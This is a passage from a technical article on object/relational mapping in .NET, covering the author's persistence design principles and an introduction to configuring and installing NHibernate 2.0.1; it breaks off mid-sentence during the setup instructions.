= np.random.normal(0, 1, (num_examples, len(w))) y = np.dot(X, w) + b y += np.random.normal(0, 0.01, y.shape) return X, y true_w = np.array([2, -3.4]) true_b = 4.2 features, labels = synthetic_data(true_w, true_b, 1000) Note that each row in features consists of a 2-dimensional data point and that each row in labels consists of a 1-dimensional target value (a scalar). print('features:', features[0],'\nlabel:', labels[0]) features: [2.2122064 1.1630787] label: 4.662078 the Dataset¶ Recall that training models consists of making multiple passes over the dataset, grabbing one minibatch of examples at a time, and using them to update our model. Since this process is so fundamental to training machine learning algorithms, its worth defining a utility function to shuffle the data and access it in minibatches. In the following code, we define a data_iter function to demonstrate one possible implementation of this functionality. The function takes a batch size, a design matrix, and a vector of labels, yielding minibatches of size batch_size. Each minibatch consists of an tuple of features and labels. def data_iter(batch_size, features, labels): num_examples = len(features) indices = list(range(num_examples)) # The examples are read at random, in no particular order random.shuffle(indices) for i in range(0, num_examples, batch_size): batch_indices = np.array( indices[i: min(i + batch_size, num_examples)]) yield features[batch_indices], labels[batch minibatch tells us both the minibatch size and the number of input features. Likewise, our minibatch of labels will have a shape given by batch_size. batch_size = 10 for X, y in data_iter(batch_size, features, labels): print(X, '\n', y) break [[ 0.34832358 0.2571885 ] [ 0.37233776 0.9486392 ] [ 1.3729066 -0.97025216] [-1.1113098 -0.30177692] [ 1.006013 -0.8167455 ] [-1.024502 0.61664087] [-1.136135 0.38869882] [-0.9727549 0.9702775 ] [-0.37305322 -0.1837693 ] [ 1.4576826 -0.9084958 ]] [ 4.0371156 1.730985 10.245152 3.017058 8.986096 0.06695576 0.6105237 -1.0496663 4.0894604 10.198601 ] As we run the iterator, we obtain distinct minibatches successively until all the data has been exhausted (try this). While the iterator implemented above is good for didactic purposes, it is inefficient in ways that might get us in trouble on real problems. For example, it requires that we load all data in memory and that we perform lots of random memory access. The built-in iterators implemented in Apache MXNet are considerably efficient and they can deal both with data stored on file and data fed via a data stream. 3.2.3. Initializing = np.random.normal(0, 0.01, (2, 1)) b = np.zeros(1) Now that we have initialized our parameters, our next task is to update them until they fit our data sufficiently well. Each update requires taking the gradient (a multi-dimensional derivative) of our loss function with respect to the parameters. Given this gradient, we can update each parameter in the direction that reduces the loss. Since nobody wants to compute gradients explicitly (this is tedious and error prone), we use automatic differentiation to compute the gradient. See Section 2. Defining np.dot(X, w) is a vector and b is a scalar. Recall that when we add a vector and a scalar, the scalar is added to each component of the vector. # Saved in the d2l package for later use def linreg(X, w, b): return np.dot(X, w) + b 3.2.5. Defining. # Saved in the d2l package for later use def squared_loss(y_hat, y): return (y_hat - y.reshape(y_hat.shape)) ** 2 / 2 3.2.6. Defining the Optimization Algorithm¶ As we discussed in the previous section, linear regression has a closed-form solution. However, this is not a book about linear regression, it is will estimate the gradient of the loss with respect to our parameters. Next, we will update our parameters (a small amount) in the direction that reduces the loss. Recall from Section 2.5 that after we call backward each parameter ( param) will does not depend heavily on our choice of the batch size. # Saved in the d2l package for later use nearly identical training loops over and over again throughout your career in deep learning. In each iteration, we will grab minibatches of models, first passing them through our model to obtain a set of predictions. After calculating the loss, we call the backward function to initiate the backwards pass through the network, storing the gradients with respect to each parameter in its corresponding .grad attribute. Finally, we will call the optimization algorithm sgd to update the model parameters. Since we previously set the batch size batch_size to \(10\), the loss shape l for each minibatch is (\(10\), \(1\)). In summary, we will 11. dataset are used once in one epoch # iteration. The features and tags of minibatch24955 epoch 2, loss 0.000089 epoch 3, loss 0.000051 In this case, because we synthesized the data ourselves, we know precisely41616 -0.00010514] Error in estimating b [0.00035763] Note that we should not take it for granted that we are able to recover the parameters accurately. This only happens for a special category problems: strongly convex optimization problems with “enough”, stochastic gradient descent can often find remarkably good solutions, owing partly to the fact that, for deep networks, there exist many configurations of the parameters that lead to accurate prediction.?
https://d2l.ai/chapter_linear-networks/linear-regression-scratch.html
CC-MAIN-2019-51
refinedweb
1,261
55.13
This exception is the base class for all other exceptions in the errors module. It can be used to catch all errors in a single except statement. The following example shows how we could catch syntax errors: import mysql.connector try: cnx = mysql.connector.connect(user='scott', database='employees') cursor = cnx.cursor() cursor.execute("SELECT * FORM employees") # Syntax error in query cnx.close() except mysql.connector.Error as err: print("Something went wrong: {}".format(err)) Initializing the exception supports a few optional arguments, namely msg, errno, values and sqlstate. All of them are optional and default to None. errors.Error is internally used by Connector/Python to raise MySQL client and server errors and should not be used by your application to raise exceptions. The following examples show the result when using no arguments or a combination of the arguments: >>> from mysql.connector.errors import Error >>> str(Error()) 'Unknown error' >>> str(Error("Oops! There was an error.")) 'Oops! There was an error.' >>> str(Error(errno=2006)) '2006: MySQL server has gone away' >>> str(Error(errno=2002, values=('/tmp/mysql.sock', 2))) "2002: Can't connect to local MySQL server through socket '/tmp/mysql.sock' (2)" >>> str(Error(errno=1146, sqlstate='42S02', msg="Table 'test.spam' doesn't exist")) "1146 (42S02): Table 'test.spam' doesn't exist" The example which uses error number 1146 is used when Connector/Python receives an error packet from the MySQL Server. The information is parsed and passed to the Error exception as shown. Each exception subclassing from Error can be initialized using the previously mentioned arguments. Additionally, each instance has the attributes errno, msg and sqlstate which can be used in your code. The following example shows how to handle errors when dropping a table which does not exist (when the DROP TABLE statement does not include a IF EXISTS clause): import mysql.connector from mysql.connector import errorcode cnx = mysql.connector.connect(user='scott', database='test') cursor = cnx.cursor() try: cursor.execute("DROP TABLE spam") except mysql.connector.Error as err: if err.errno == errorcode.ER_BAD_TABLE_ERROR: print("Creating table spam") else: raise Prior to Connector/Python 1.1.1, the original message passed to errors.Error() is not saved in such a way that it could be retrieved. Instead, the Error.msg attribute was formatted with the error number and SQLSTATE value. As of 1.1.1, errors.Error is a subclass of the Python StandardError.
http://dev.mysql.com/doc/connector-python/en/connector-python-api-errors-error.html
CC-MAIN-2016-30
refinedweb
402
53.78
Eclipse Community Forums - RDF feed Eclipse Community Forums OneToMany list contains null entries when using OrderBy and shared cache <![CDATA[Hi, we have a problem in our software when using EclipseLink with a OneToMany relationship. A colleague of mine already posted to the Glassfish forum some time ago: lipselink-onetomany-list-contains-null-entries Quote: @Entity public class A { @OneToMany( Chris]]> Christoph John 2011-03-24T08:55:31-00:00 Re: OneToMany list contains null entries when using OrderBy and shared cache <![CDATA[That reference is out of context, and is not a warning that orderby does not work. It is a warning that the objects read in might come from the cache, but the @OrderBy only applies when the collection is read in from the database - essentially stating that the JPA provider does not maintain the list order for you. So if you make changes to the list, the next time you read the owner, you may see the list in the same order as you left it in - depending on if the object was in the cache or if it had to be built/refreshed from the database since your changes were made. There was a problem with nulls, but is was a specific situation involving attribute change tracking and merging that does not seem to be occuring here. As your attempt to reproduce shows, it is not a common situation, or one that we have seen before (that I am aware of) and likely a product of a specific set of conditions in your application. As the last issue I was aware of dealt with change tracking, I figure that is a good place to start in isolating the issue though it is difficult to guess. Best Regards, Chris]]> Chris Delahunt 2011-03-24T13:58:03-00:00
http://www.eclipse.org/forums/feed.php?mode=m&th=206526&basic=1
CC-MAIN-2014-35
refinedweb
301
59.87
Journal ynotds's Journal: Don't ever call submit submit This really should have been a headline item in HTML 101 but it is surprisingly difficult to find a quick explanation of the non-obvious diagnostics which eventually led me to a relatively simple problem. When there is a namespace clash in JavaScript, properties outrank methods. When you name a submit button, that name becomes a property of the containing form. Assuming the containing form tag says name='myformname', the very useful document.myformname.submit() method becomes unreachable. And the obvious answer, changing the form name, becomes impossible to contemplate when your main client's business-defining intranet is built on middleware which calls every submit button submit so that progress through a process is represented by values of $in{'submit'}. I've even relatively recently added code which logs $in{'submit'} along with other details of every process that is run so we can learn more about actual usage patterns. Don't ever call submit submit More Login Don't ever call submit submit Slashdot Top Deals
https://slashdot.org/~ynotds/journal/188393
CC-MAIN-2016-36
refinedweb
178
50.57
I ran into an interesting (well, it’s all relative) content deployment issue the other day, which I’m pretty sure will apply to both SharePoint 2007 and SharePoint 2010. In preparation for some SharePoint training I was delivering at my current client, I wanted to move some real data from production into the training environment to make the training more realistic. To do this, I used my Content Deployment Wizard tool, which uses SharePoint’s Content Deployment API to export content into a .cmp file. (Quick background – the tool does exactly the same thing as ‘STSADM –o export’ and out-of-the-box content deployment, but allows more control. A .cmp file is actually just a renamed cab file i.e. a compressed collection of files, similar to a .wsp). However, when importing the .cmp file containing my sites/documents etc., the operation failed with the following error: The element 'FieldTemplate' in namespace 'urn:deployment-manifest-schema' has invalid child element 'Field' in namespace ''. List of possible elements expected: 'Field' in namespace 'urn:deployment-manifest-schema'. So clearly we have a problem with a field somewhere, and it’s an issue I was vaguely aware of – cross-web lookup fields deployed with a Feature break content deployment. Michael Nemtsev discusses the issue here, saying “There are several samples how to deploy lookup fields via feature () but all of them are not suitable for the Content Deployment Jobs. Because you will get the exception...” Oops that’s a link to an old article of mine. So effectively *my* code to create lookup fields doesn’t work with *my* content deployment tool – don’t you just love it when that happens?! However, I actually have a clear conscience because I know both utilities are doing valid things using only supported SharePoint APIs – this is simply one of those unfortunate SharePoint things. As Michael says, all of the cross-web lookup field samples would have this issue. So what can we do about it? For fields yet to be created In this scenario my recommendation would be to use the technique Michael suggests in his post, which is to strip out the extraneous namespace at the end of our code which creates the lookup. For fields which are already in use (i.e. the problem I ran into) If your lookup fields have already been deployed, then you have 2 options: - develop and test a script to retrospectively find and fix the issue across your web/site collection/farm/whatever scope you need - fix the issue in the .cmp file you were trying to import in the first place, so this particular import will succeed Clearly your decision might depend on how much content deployment you want to do to the site/web/document library or list which has the problem. If you’re anticipating doing it all the time, you should fix the underlying issue. If, as in my scenario, you just need to get an ad-hoc import to succeed, here’s how.. Hacking the .cmp file The process is effectively to fix-up the .cmp file, then rebuild it with the updated files. I noticed an unanswered question on Stack Overflow about this process, so clearly it’s something that can occasionally arise. Of course even in these WSPBuilder/SP2010 tools days, all SharePoint devs should know you can use makecab.exe with a .ddf file to build a cab file – but what happens when you have hundreds of files? That’s hundreds of lines you’ll need in your .ddf file? Certainly you could write some code to generate it for you, but chances are you’re looking for a quick solution. The first process I came up with was: - Rename .cmp file to .cab, extract files to other directory. - Fix-up files (more detail shortly). - Use WSPBuilder to generate the .ddf file from files on filesystem – edit this to ensure paths are correct. - Use makecab.exe + the generated .ddf file to build the .cab file. - Rename extension to .cmp. However, a slightly better way is to use Cab File Maker, like this: - Rename .cmp file to .cab, extract files to other directory. - Fix-up files – to do this, edit manifest.xml, remove all instances of following string - “xmlns=” - Open Cab File Maker 2.0, drag files in and set options for where to generate ddf file and cmp file, like so: - Voila – your cmp file is now ready to go and should import successfully.
https://www.sharepointnutsandbolts.com/2010/01/editing-cmp-files-to-fix-lookup-field.html
CC-MAIN-2021-39
refinedweb
747
64.71
mallinfo() Get memory allocation information Synopsis: #include <malloc.h> struct mallinfo mallinfo ( void ); Since: BlackBerry 10.0.0 Library: libc Use the -l c option to qcc to link against this library. This library is usually included automatically. Description: The mallinfo() function returns memory-allocation information in the form of a struct mallinfo: struct mallinfo { int arena; /* size of the arena */ int ordblks; /* number of big blocks in use */ int smblks; /* number of small blocks in use */ int hblks; /* number of header blocks in use */ int hblkhd; /* space in header block headers */ int usmblks; /* space in small blocks in use */ int fsmblks; /* memory in free small blocks */ int uordblks; /* space in big blocks in use */ int fordblks; /* memory in free big blocks */ int keepcost; /* penalty if M_KEEP is used -- not used */ }; Returns: A struct mallinfo. Classification: Last modified: 2014-06-24 Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus
http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/m/mallinfo.html
CC-MAIN-2017-34
refinedweb
157
60.85
Created on 2009-04-03 01:24 by nneonneo, last changed 2010-02-05 17:13 by pitrou. This issue is now closed. . OK,). related: f=open('test','w+b') f.write('123456789ABCDEF') #f.seek(0) print "position",f.tell() print '[',len(f.read()),']' f.close() windows: 2.6.2 mingw/ 2.6.4 msvc builds len(f.read()) > 0 ( 4081 when i did the test ) but should be 0 printing the buffer show binary garbage. linux is ok f.read() return '' as expected It seems like this is actually a problem in Windows libc or something (tested using MinGW on Windows XP): #include <stdio.h> main() { FILE *f = fopen("test", "wb"); fwrite("test", 1, 4, f); char buf[2048]; size_t k = fread(buf, 1, 2048, f); printf("%d\n", k); int i=0; for(; i<k; i++) printf("%02x", buf[i]); } This causes a lot of garbage to be printed out. Removing the fwrite causes "0" to be printed with no further output. The garbage is not from the uninitialized buffer, since I've verified that the original contents of the buffer are not what is being printed out. Furthermore, adjusting 2048 produces a maximum output of 4092 bytes (even with 9999 in place of 2048). Short of simply denying read() on writable files, I don't really see an easy way around this libc bug. I wonder if this is technically a bug. The stream is not opened for reading and yet you do an fread. I quickly glanced through the C-Standard and I did not find an _explicit_ paragraph that this is undefined behavior, but personally I'd expect it to be. Regarding the last C example. Also here, you do not open using "w+". Now, even if you used "w+", by the standard you'd have to do an fflush, fseek, fsetpos or rewind before reading. I don't see a libc bug. Bug or not, this can be handled since fread sets EBADF on Windows. The patch should come with a test. I see that a complete errno based solution would get messy. To avoid interfering with EAGAIN special cases, this would be needed: #if defined(EBADF) #define ERRNO_EBADF(x) ((x) == EBADF) #else #define ERRNO_EBADF(x) 0 #endif Then, additional checks would need to be added to get_line, getline_via_fgets and a couple of other places. I think the right thing is to add a field f_modeflags to the file object, to be initialized on creation. Or use f->readable, f->writable like py3k. Thoughts? I think checking errno would be fine (provided it eliminates all variations ot this bug).. Ok, then perhaps it's better to have some internal {readable, writable} flags based on the original mode string. The new patch takes over the logic from fileio.c. Tested on Linux, Windows x86/x64 and OpenSolaris. Hmm, test_file.py is for the new IO library (backported from 3.x). You should use test_file2k.py for tests against the 2.x file object. Also, readinto() should take something such as a bytearray() as argument, not a string. Thanks Antoine, I fixed both issues. Oh and the following line shouldn't be needed: data = b'xxx' if 'b' in mode else u'xxx' Since old-style file objects always take bytestrings (it's harmless, though, because the unicode string will be implicitly converted). Ok, I'll fix that. Perhaps I should also remove the comment in err_mode(). I wonder if the ValueError in fileio.c is intentional: >>> import io >>> f = io.open("testfile", "w") >>> f.write("xxx") 3 >>> f.read() Traceback (most recent call last): File "<stdin>", line 1, in <module> IOError: not readable >>> >>> f = io.FileIO("testfile", "w") >>> f.write("xxx") 3 >>> f.read() Traceback (most recent call last): File "<stdin>", line 1, in <module> ValueError: File not open for reading > I wonder if the ValueError in fileio.c is intentional: I don't know, but this would be the subject of a separate issue anyway. The patch was committed in r77989 (trunk) and r77990 (2.6). Thank you Stefan!
http://bugs.python.org/issue5677
CC-MAIN-2017-09
refinedweb
675
76.93
According to Spotlight requirements: Note: Spotlight will run on 64-bit versions of the client operating system with the use of a 32-bit Oracle client. If you have 64-bit server and 32-bit client installed on the same computer it's possible that Spotlight looks for oci.dll at wrong Oracle Home. Examine order of Oracle home directories from Universal Installer and place 32-bit home first: Run Oracle Universal Installer Click "Installed Products" button Switch to "Environment" tab Reorder Oracle Homes with arrows on right side and click "Apply" reasoning over lots of facts and triggering actions when a set of facts matches specific conditions is a good match for drools. you could represent every action/decision that the player has made as a fact, which you could insert into a drools knowledge session. in that session you could store all of your "triggers" as drools rules, which will fire when a collection of facts in memory match the condition. drools supports dynamic addition/removal/editing of rules and is explicitely targeted at allowing non-developers to write logic using a simpler rule language. the specific part of drools to start with is the core - drools expert Row: (index - 1) div nrOfColumns + 1 Column: (index - 1) mod nrOfColumns + 1 Your examples : (5-1) div 3 + 1 = 2, (5-1) mod 3 + 1 = 2 --> (2, 2) (8-1) div 3 + 1 = 3, (8-1) mod 3 + 1 = 2 --> (3, 2) Forgot about this question from a long time ago, but it turns out MediaWiki has a buit in function for this $myNamespace = $article->getTitle()->getNamespace(); Since the article object is by default passed to an extension hooked to an on_save process, this will get the namespace as a numeric value. How about Capture inputting text on key press event of cell. like this Check if the text matches with custom functions. If matches, then show something like label or shape to pretend be a tooltip. like this Is this acceptable? It is a little ugly but easier. A simple on-screen answer using Write-Host $userGroups | %{Write-Host "Removing user from group $_"; get-adgroup $_ | Remove-ADGroupMember -confirm:$false -member $SAMAccountName} You = By default ASP.NET pages already have a <form> tag that wraps the entire page. So if you add a further <form> tag you end up with nested forms which isn't allowed. You can usually get away with dropping your inner <form> tag."); } Try using the entity code described at HTML Codes - Characters and symbols. For ' the symbol is ' Also see IMPLEMENTING TOOLTIPS FOR MICROSOFT DYNAMICS CRM 2011, which verifies this approach. To prevent the groupbox from disappearing just set its Constraints.MinHeight to the same value as the splitter MinSize. The splitter will snap the fixed control (groupbox) into its MinHeight value when the Height is below the MinSize.| %> How about using the $el and adding it there ? form.$el.attr("class", "testing"); live example. I finally found the solution: For Ext 4.0, you need to set the contentType of the response like "html/text", and then, sorround the json string with tags. Take a look on this for further information. You should do this in your model by adding your substring before the value que form will send you. This seems business logic, it shouldn't be in the view. def post_tickets(params) client.username = "Hello From, " + client.username client.post_tickets(params)) Try this:- var clone = row.cloneNode(true); // copy children too var theName= row.getAttribute('name'); clone.setAttribute('name', theName + counter++);// change id or other attributes/contents Change the FlowDirection() of your FlowLayoutPanel to TopDown. Edit: Also, get rid of the for loop...what is that supposed to be doing? Maybe something like? using (SqlConnection myDatabaseConnection = new SqlConnection(myConnectionString.ConnectionString)) { myDatabaseConnection.Open(); using (SqlCommand SqlCommand = new SqlCommand("Select LastName from Student", myDatabaseConnection)) using (SqlDataAdapter da = new SqlDataAdapter(SqlCommand)) { int i = 0; SqlDataReader DR1 = SqlCommand.ExecuteReader(); while (DR1.Read()) { i++; UserControl2 userconrol = new UserControl2(); userconrol.Tag = i; userconrol.LastName = (string)DR1["LastNa']; The problem was the selector $('#input2' + num2) when the script is executed first, there is only one element with id input2, but your selector is looking for an element with id input21 which does not exits. I fixed it by cloning the last element with class clonedInput2 instead of finding the element with id jQuery(function($) { $('#btnAdd2').click(function () { var num2 = $('.clonedInput2').length; // how many "duplicatable" input fields we currently have var newNum = num2 + 1; // the numeric ID of the new input field being added // create the new element via clone(), and manipulate it's ID using newNum value var newElem2 = $('.clonedInput2:last').clone().attr('id', 'input2' + newNum); // manipulate the name/id values of the input inside)
http://www.w3hello.com/questions/-Quest-Adding-a-new-Web-Form-to-ASP-NET-app-
CC-MAIN-2018-17
refinedweb
788
55.84
I'm trying to read a character in from the keyboard, however, the first time I try to read data of type "char" it ignores the comand. There are other scanf's previous to the first char-attempt for inputting doubles. Here is some code. this is only part of the code, but after running, this is what appears on the screen:this is only part of the code, but after running, this is what appears on the screen:Code: #include <stdio.h> //prototypes double ends(char, double*, double*); int main(void){ //this will be used to define the endpoints of the calculations char ch='p'; double a; double rightend, leftend, step; //defining the inputs printf("Enter the lattice constant, a, then hit enter: "); scanf("%lf", &a); //this step reads the value input from the keyboard printf("\n\n"); //ends returns the stepsize and also defines the left and right endpoints. step = ends(ch, &leftend, &rightend); printf("%lf, %lf, %lf\n\n", leftend, rightend, step); return 0; } double ends(char yorn, double *left, double *right){ double step, leftend, rightend; //this section defines the range of r over which the energy is calculated while(1){ if(yorn!='y'&&yorn!='n'){ printf("Do you want to use the range \n[0.35 <= a2 <= 2.0] \nwith a step size of 0.01 (y or n) ?: "); //( recall: r = a2 * a) scanf("%c", &yorn); printf("\n\nthe characeter 'ch' is %c.\n\n", yorn); } else if(yorn == 'y'){ leftend = 0.35; rightend = 2.0; step = 0.01; break; } else{ printf("enter the left endpoint: "); scanf("%lf", &leftend); printf("enter the right endpoint: "); scanf("%lf", &rightend); printf("enter the step size: "); scanf("%lf", &step); break;} } *left = leftend; *right = rightend; return step; } Enter the lattice constant, a, then hit enter: 1 Do you want to use the range [0.35 <= a2 <= 2.0] with a step size of 0.01 (y or n) ?: the characeter 'ch' is . Do you want to use the range [0.35 <= a2 <= 2.0] with a step size of 0.01 (y or n) ?: y the characeter 'ch' is y. 0.350000, 2.000000, 0.010000 Press any key to continue It seems as though the fist scanf is ignored, but the second one actually works. Please help me get rid of this nuisance. Thanks in advance, Josh
https://cboard.cprogramming.com/cplusplus-programming/72303-scanf-trouble-printable-thread.html
CC-MAIN-2017-13
refinedweb
387
75.81
Take. In my work, I have observed that data access is one of the more complex and error-prone elements of many business computer systems. Developers always seemed to fight with the persistence mechanism and the related problems it caused for deployment, upgrades/changes, integration, reporting, and other important aspects of a complete enterprise line-of-business application. When I moved to .NET and started leveraging its OO capabilities, it seemed data access became even more complex. I found that I frequently had to compromise either OO principles or data access principles and it never seemed to work out as well as I had hoped. As I started trying to solve more complicated challenges like reporting, integration with other systems, schema migration from one version to the next, and other enterprise concerns, it only got worse and more complex. As time went on, I spent some more time researching the problem and became aware of a new type of solution. The theory is that, in object-oriented systems, there is a fundamental mismatch between the inherent capabilities, strengths, and weaknesses of object-oriented design and the inherent capabilities, strengths, and weaknesses of a relational data structure design. Many of the problems and resultant defects commonly observed in the persistence layer of an application, the theory suggests, trace back to this inherent mismatch. The theory calls this mismatch the “impedance mismatch.” Keeping this in mind, an application architect who operates under this theory should aim to reduce the complexity by avoiding this mismatch. Primary Source of Complexity: The Problem Domain All applications exist to solve one or more problems. The “problem domain” (or “domain” for short) is these problems that the application attempts to solve. The domain is where the primary complexity lay and will involve the most attention from programmers, designers, and architects. Statements such as “Inactive employees should not be scheduled for work items” usually express these domain problems. Since I like to use object-oriented systems such as .NET, I would likely start out trying to model this problem using an “Employee” object and a “Work Item” object. I might have an “Active” Boolean property on Employee as well as a method called “ScheduleWorkItem” that would attempt to schedule a work item for that Employee and report problems if any exist. This is a contrived example, of course, but you will hopefully get the general idea. I have found that object-oriented design gives me the right balance of rigidity and flexibility necessary to address most of the complexity I run into in most line-of-business problem domains. I like to call objects like “Employee” and “Work Item” entities. Entity is one of those terribly overloaded words with conflicting definitions depending on the context. To me, in the context of domain modeling, entity has a specific definition: A single, uniquely identified unit which represents a set of related data and behavior that is different from other single, uniquely identified units of data and behavior. Entities are very important in my systems. Their identifier never changes, but their data and behavior may, according to the rules of the problem domain. Finally, I find that languages like C#, VB, and others as well as the capabilities of the .NET Framework afford me better options for making decisions to solve domain problems and to craft and design my entities within that domain. Secondary Source of Complexity: Persistence Another source of complexity in my applications is the persistence and retrieval of entity data. Today, there are many options for the underlying data persistence store from object-oriented database (OODB), file-based stores, cloud stores, and, of course, the most prevalent: the relational database management system (RDBMS). Currently, I still prefer using RDBMSs such as Microsoft SQL Server as the underlying persistence store. RDBMSs are, as the ‘R’ implies, relational data stores. This means that the theory of impedance mismatch is in play and is a problem I must address. When architecting a system, I have several principles I use to guide me when choosing which solution to use to mitigate the impedance mismatch problem. They are not absolute rules, though and I sometimes do violate them if I have very good justification. Principles are, after all, to guide, not to dictate. My principles of persistence are: - persistence ignorance: Since the domain is usually complex enough, I do not need to add the extra complexity of allowing persistence-related concerns bleeding into my domain entity logic. I keep persistence concerns, to the maximum extent possible, in the persistence layer. It never works out 100%, but what few compromises I must make are tolerable. - domain concerns are the concern of the domain: It’s hard enough keeping the domain consistent and defect-free without allowing domain concerns, business logic, and other such concepts escaping from the domain and appearing in others areas of the application such as the presentation layer, the database (SQL stored procedures), ad-hoc queries with inherent logic embedded in WHERE clauses, etc. Decisions that are the concern of the domain should flow from the domain out into other parts of the system and those parts should respect the domain’s authority to determine how those decisions are determined. - reporting, data integration, and schema versioning, are separate problem domains: This is perhaps one of the easiest principles to fail on proper adherence. It’s easy to allow complex query specifications (that is, reports) to creep into the domain. When I use the word “report”, I don’t just mean things like “ad-hoc reports” (think Crystal Reports, SQL Server Reporting Services, and similar products). I mean anything that involves submitting a query for data using more than a few simple criteria-possibly criteria specified by the user. In many cases, I will consider handling these types of queries/reports in a view, stored procedure, or some other facility of the database designed for the given type of situation. I take great care, though, putting anything that will likely see frequent change into the database as it is usually more difficult to handle change management, versioning, and other such concerns. I realize that I have to balance the needs of the application with the needs of the business demands of frequent change and rapid deployment while maintaining high quality. These aspects can be at odds and require a high degree of discipline and consideration. For most situations, database persistence and querying is a repetitive, consistent, and well known problem space. However, in many projects today, developers are writing data access code from scratch or re-writing it from a previous attempt on a previous project. In the .NET space, there are many tools that aid in the problems involved with ADO.NET data access. From my experience, these are mostly-solved problems and it is, frankly, wasteful to write simple CRUD data access directly against ADO.NET today when these tools make it easier, safer, and better performing than the average developer could accomplish in a reasonable period of time writing their own persistence framework. One genre of these tools stands out especially: object/relational mapping frameworks. In the next section, I will explain object/relational mapping (O/RM) and how O/RM tools can greatly accelerate your product development and reduce defects and complexity from your domain and applications. Object/Relational Mapping The several currently available object/relational mapping frameworks (heretofore O/RMs) for .NET take several different forms and have different strengths and weaknesses because of this. I won’t go into a full analysis and comparison because it is out of the scope of this article. There are a few features that I find particularly compelling or even mandatory in an O/RM offering I might consider. Among these are: persistence ignorance, POCO support, transparent lazy loading, and mapping separate from the model. Persistence Ignorance and POCO Support I’ve already mentioned persistence ignorance earlier in this article so I’ll jump right to POCO (Plain old C#/CLR Object). POCO is important because I want to be able to use my domain entity objects without having to attach to a database. Many persistence frameworks (non-O/RM and some O/RM) in use today require objects be connected to a database to even call their constructor. To me, this is an unacceptable requirement as it hampers my ability to use the objects outside of a database persistence context. Unit testing the behavior in my entities would be extremely complicated if not impossible. POCO also represents the fulfillment of persistence ignorance in that my entities are not required to do or implement much of anything besides some baseline .NET requirements. Transparent Lazy Loading Most O/RMs support some form of lazy loading. Lazy loading is the concept where certain properties or related entities for a given entity are not directly loaded when the entity is loaded. Instead, they can be loaded on-demand later (triggering another database call). Lazy loading simplifies matters on the “O” side of O/RM in that objects are easily available without having to do a lot of back-and-forth with the persistence framework to retrieve the objects needed when they’re needed. Lazy loading comes in two forms: direct and transparent. Direct means that the programmer must initiate the lazy loading directly (by calling the method “LazyLoad()” on the “Orders” property of the “Customer” entity, for example). Transparent means that the programmer can simply start enumerating over the “Orders” collection and the lazy loading will happen automatically without any separate or additional method calls on the object. Each of these approaches has its plusses and minuses. I have found that, ultimately, transparent lazy loading works best and fits best with my other goal of persistence ignorance. If I have to call things like “LazyLoad()” on my entities, I have allowed persistence concerns to seep into my domain model. With transparent lazy loading, I can use my entities the same way in code whether they’re being serviced from the database or some other data source. Of course, this doesn’t mean I get to be lazy about lazy loading and ignore the extra performance cost of a potentially unnecessary extra round trip to the database. I balance this against the need for rapid development. When I know that I will need the extra data no matter what, I can signal this to the persistence framework when I’m querying to go ahead and eager-fetch the data that would otherwise be lazy loaded. Mapping Separate from the Model Another aspect of a successful O/RM, for me, is that I am able to map between the object model and the relational model separately from either. That is, the relational model should not need to know nor care about the object model and vice versa. This means no attributes on my .NET classes, and no .NET type names in the database, for example. Thus mapping is, in and of itself, a first-class citizen. It will require maintenance along with the code and the database schema. Without the mapping, neither the objects nor the relational model work very well or accomplish much of anything. Tooling for the mapping is important for me also. The mapping must be easy to create, edit, maintain, etc. Introduction to NHibernate One O/RM that particularly stands out and meets every single criterion I mentioned above to one extent or another is the NHibernate framework. NHibernate is a .NET project based heavily upon the Java-based Hibernate framework. Hibernate 1.0 was released in 2002. The 1.0 release of NHibernate occurred in 2005. It had been enjoying decent circulation and usage as a point-release for some time before then, however. NHibernate is about four years old at the time of this writing. That reminds me of another aspect of a good O/RM I look for: maturity. Building a good O/RM is non-trivial and so maturity and staying power is a preferable feature of an O/RM. NHibernate is one of the oldest and most active O/RM frameworks for .NET. NHibernate leverages ADO.NET under the covers to achieve its data access. This means that it is compatible with various ADO.NET drivers and features. NHibernate composes parameterized statements when interacting with the underlying database connection. NHibernate has a concept of “dialects” and “drivers” for handling the differences and idiosyncrasies of various flavors of SQL (T-SQL, and PL-SQL, for example) and database engines (SQL Server, Oracle, MySQL, and Firebird, to name a few). NHibernate supports an extensive list of database engine platforms, versions, and SQL dialects. One benefit of this is that applications written using NHibernate for their data access can, with relative ease, support multiple database platforms with far fewer changes and reduced testing complexities. In most cases, the difference between supporting Microsoft SQL Server 2005 and Oracle 9i is a single line configuration file change. NHibernate uses a simple XML configuration file to specify the dialect, driver, connection string, and various other operational options. You can also configure it programmatically using your own configuration mechanism if you prefer not to use XML or you have some other requirement for how you configure your applications. Typically, you specify the object/relational mappings through XML though there are several other options. Called Hibernate Mapping XML files or “HBM XML” for short, these XML files can be loaded from disk, embedded as a resource in an assembly, or loaded via some other means and passed as an XmlDocument to NHibernate’s configuration API directly. Finally, after you’ve configured NHibernate at startup, you create a “SessionFactory” (once per application) and use this factory to create “sessions” through which all the important and interesting data access stuff happens. The SessionFactory is thread-safe so you can call it from multiple threads or ASP.NET requests safely. The NHibernate ISession object is perhaps the most visible part of NHibernate and the piece of the framework with which you will likely be having the most interaction. Logically speaking, the ISession represents an active connection and transaction to the database (though do not directly equate those things as the ISession may manage connections and transactions differently under the covers depending on various factors). A given ISession instance also will have a first-level cache of objects it has recently retrieved from or saved to the database to prevent doing extra duty or having duplicate objects floating around for a particular session. The ISession instance is also the gateway to performing CRUD operations, among other things. We’ll get more into the specifics later in this article. Getting Started with NHibernate At the time of this writing, NHibernate’s current released version is 2.0.1. NHibernate 2.1 is under active development and has some exciting new features. For now, though, I’ll concentrate on 2.0.1 which has more than enough features to fill this article and then some. Downloading NHibernate 2.0.1 NHibernate is an open source project managed along with the Hibernate project (among others). You can get the installation package as well as documentation and links to receive support and guidance via the Hibernate.org Web site: Before I proceed, I should also mention the growing NHibernate community and suite of contributory/add-on projects. You can learn more about NHibernate, view documentation, and browse related projects at NHForge: Click on the link to download which should take you to the SorceForge download page. Continue clicking the download links until finally you have a choice between a “bin” and a “src” variant of the NHibernate ZIP file. Download the “bin” variant and unzip it to a folder on your hard drive. Also inside the ZIP file are two XSD (XML Schema Definition) files. These files enable Visual Studio to help give you IntelliSense and validation as you author NHibernate XML configuration and entity mapping documents in Visual Studio. Copy these files to your Visual Studio installation’s XML schema directory. For Visual Studio 2008, this is usually “C:\Program Files\Microsoft Visual Studio 9.0\Xml\Schemas.” If you have a 64-bit version of Windows, it will be in “Program Files (x86).” Once you copy the XSD files to this folder, Visual Studio will now detect 